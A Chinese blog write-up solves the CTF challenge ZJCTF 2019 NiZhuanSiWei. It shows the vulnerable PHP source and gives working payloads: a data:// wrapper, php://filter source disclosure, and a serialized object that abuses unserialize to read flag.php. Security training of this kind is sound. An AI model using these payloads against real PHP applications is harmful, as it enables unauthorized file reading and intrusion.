[ZJCTF 2019]NiZhuanSiWei 1

最新推荐文章于 2024-02-19 19:47:39 发布
最新推荐文章于 2024-02-19 19:47:39 发布
阅读量1.2k 收藏
点赞数 3
分类专栏: CTF 文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44477223/article/details/115220621
版权
本文详细解析了一道[ZJCTF2019]NiZhuanSiWei的代码审计题目,涉及PHP的file_get_contents函数、data伪协议的使用以及如何通过base64编码绕过限制。通过分析,作者展示了如何利用unserialize函数进行反序列化攻击,最终获取FLAG。
摘要由CSDN通过智能技术生成

[ZJCTF 2019]NiZhuanSiWei

题目运用的知识点

php伪协议

题目

打开发现是代码审计题,分析代码

 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];//三个赋值
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";//这里是第一个绕过
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;//这里是第二个需要绕过的点
    }
}
else{
    highlight_file(__FILE__);
}
?>

分析代码

(file_get_contents($text,'r')`

这个函数把整个文件读入一个字符串中。
该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持,还会使用内存映射技术来增强性能。

我们不知道后台文件,所以这里我们运用data伪协议来进行绕过。
构造pl /?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
在这里插入图片描述
成功绕过第一个

再看第二个绕过点,上传的时候不能出现flag

if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); }
        else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;

我们将它base64一下,防止文件中包含的php代码直接当成命令来执行
/?file=php://filter/read=convert.base64-encode/resource=useless.php
得到一个base64加密的代码

解密得到PHP代码

 <?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

我们将它直接反序列化得到

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
最后的payload为?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
在这里插入图片描述
得到FLAG

无独有偶o
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
魔术方法总结
梦里不知身是客
12-26 9859
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
web buuctf [ZJCTF 2019]NiZhuanSiWei1
weixin_44214568的博客
03-14 1281
一共有三个参数,需要考虑传参,php传参,而且是text和file这样的值,基本可以考虑需要用php伪协议 , php伪协议是基于文件包含的,文件包含有本地包含和远程包含, 当包含的文件在远程服务器上时,就形成了远程文件包含。 远程文件包含需要在 php.ini 中设置: allow_url_include = on(是否允许 include/require 远程文件) allow_url_fopen = on(是否允许打开远程文件) php伪协议是php支持的协议和封装协议 贴(我从...
广东省2023技能大赛网络安全赛项 C模块wp
最新发布
04-20
**1. 综合运用网络安全知识** - **网络协议**:选手们需要掌握各种网络协议的工作原理,如TCP/IP模型中的各层协议及其功能,这对于理解网络流量以及攻击方式至关重要。 - **漏洞利用**:了解常见的漏洞类型(例如...
[ZJCTF 2019]NiZhuanSiWei
wuuconix's blog
04-01 247
[ZJCTF 2019]NiZhuanSiWei 这道题所有的考点我都了解过,甚至用来出过类似的题目,但是作者把它们套娃得非常不错,做下来感觉非常有意思! 考点 include 和 file_get_contents 函数的利用以及 php://input 和 php://filter/read=convert.base64-encode/resouce= 伪协议的利用 主界面 <?php $text = $_GET["text"]; $file = $_GET["file"]; $p
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解)
小宇的web博客
01-21 3343
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解) 这里打开之后是一段源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".
2021-09-01[ZJCTF 2019]NiZhuanSiWei
plant1234的博客
09-07 803
[ZJCTF 2019]NiZhuanSiWei 首先根据连接打开得到一个,PHP源码: 根据源码分析,我们需要GET三个参数分别是:text,file,password 首先需要检查是否对text传一个文件,并且文件内容要是welcome to the zjctf,才能进行下一步 这里涉及到一些PHP为协议: 两个配置 PHP.ini all_url_include在php 5.2以后添加,安全方便的设置(php的默认设置)为: allow_url_fopen=on; 允许url里的封装协议访问文件
[ZJCTF 2019]NiZhuanSiWei 1详解记录
sinat_61654365的博客
02-19 416
接下来再来看看file参数访问flag被正则掉了,看到下面代码含有useless.php文件,尝试读取这个php文件。这里可以将file参数设置为flag.php并进行序列化输出应该是下面反序列化的password参数。text参数不为空,还要从文件里读取字符串是welcome to the zjctf。这时候就用到了我们的data:// 写入协议了。阅读代码可以知道需要传递三个参数。读取文件内容并输出到页面。查看源码即可得到flag。
[ZJCTF 2019]NiZhuanSiWei 1学习笔记
weixin_45869407的博客
10-12 1352
刚刚做了一下PHP的代码审计,原以为自己能够做出来,果然还是练习不够,看到text就以为直接传参就OK了,结果试了半天不行,看大佬writeup才发现原来要通过PHP伪协议来传参。 首先看到的是text的参数,它使用了file_get_contents()函数,说明就需要传入文件类型的数据,但text是GET,所以这里就要使用伪协议data。 这里对伪协议的描述挺好的 可以从表上看出,data有4种方式,这里我使用/?text=data://text/plain;base64,d2VsY29tZSB0b
ctf之php伪协议的使用
一只菜鸟呀的博客
05-20 1371
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。当它与包含函数结合时,php://filter流会被当作php文件执行。可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。zip:// 可以访问压缩包里面的文件。当它与包含函数结合时,zip://流会被当作php文件执行。
渗透测试练习题解析 1(CTF web)
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-08 1084
简单来说waf就是防火墙,用来保护网页信息,它对其中一种恶意注入方式sql注入的防护方式如下:1、严格限制Web应用的数据库的操作权限,给此用户提供仅仅能够满足其工作的最低权限,从而最大限度的减少注入攻击对数据库的危害。2、检查输入的数据是否具有所期望的数据格式,
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值